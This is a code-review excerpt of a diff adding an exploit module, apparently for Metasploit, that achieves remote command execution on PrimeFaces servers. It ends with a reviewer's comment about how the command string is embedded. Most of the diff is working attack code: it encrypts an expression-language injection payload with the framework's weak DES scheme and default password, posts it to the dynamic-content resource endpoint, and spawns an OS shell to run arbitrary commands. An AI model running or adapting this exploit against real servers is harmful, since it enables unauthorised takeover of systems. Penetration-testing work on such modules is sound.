modules/exploits/linux/http/primefaces_weak_encryption_rce.rb

```diff
@@ -0,0 +1,141 @@
+        ],
+        'Payload' => {
+          'BadChars' => '"\'\\' # all threw errors
+        },
+        'Privileged' => true,
+        'DisclosureDate' => '2016-02-15',
+        'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [
+            'Universal', {},
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(80),
+      OptString.new('PASSWORD', [ true, 'The password to login', 'primefaces']),
+      OptString.new('TARGETURI', [true, 'The base path to primefaces', '/'])
+    ])
+  end
+
+  def encrypt_el(password, payload)
+    # el == Java Expression Language
+    salt = [0xa9, 0x9b, 0xc8, 0x32, 0x56, 0x34, 0xe3, 0x03].pack('c*')
+    iteration_count = 19
+
+    cipher = OpenSSL::Cipher.new('DES')
+    cipher.encrypt
+    cipher.pkcs5_keyivgen password, salt, iteration_count
+
+    ciphertext = cipher.update payload
+    ciphertext << cipher.final
+    ciphertext
+  end
+
+  def http_send_command(payload_wrapper)
+    encrypted_payload = encrypt_el(datastore['PASSWORD'], payload_wrapper)
+    encrypted_payload = Rex::Text.encode_base64(encrypted_payload)
+
+    # send the payload and execute command
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'javax.faces.resource', 'dynamiccontent.properties.xhtml'),
+      'vars_post' => {
+        'pfdrt' => 'sc',
+        'ln' => 'primefaces',
+        'pfdrid' => encrypted_payload
+      }
+    })
+
+    res
+  end
+
+  def exploit
+    cmd = payload.encoded
+
+    # good for testing
+    # cmd = "whoami"
+    # error logs will show
+    # Nov 13, 2024 7:10:32 PM org.primefaces.application.resource.StreamedContentHandler handle
+    # SEVERE: Error in streaming dynamic resource. Cannot call sendError() after the response has been committed
+    payload_wrapper = '${facesContext.getExternalContext().getResponse().setContentType("text/plain;charset=\"UTF-8\"")}'
+    payload_wrapper << '${session.setAttribute("scriptfactory","".getClass().forName("javax.script.ScriptEngineManager").newInstance())}'
+    payload_wrapper << '${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}'
+    payload_wrapper << '${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}'
+    payload_wrapper << '${session.getAttribute("scriptengine").eval('
+    payload_wrapper << '"var os = java.lang.System.getProperty(\"os.name\");'
+    payload_wrapper << 'var proc = null;'
+    payload_wrapper << 'os.toLowerCase().contains(\"win\")? '
+    payload_wrapper << 'proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"cmd.exe\",\"/C\",\"%s\"]).start()' % cmd
```

Comment:
Can we embed the command as a variable and reference it here and on the line below, rather than embedding it twice by using `%s`?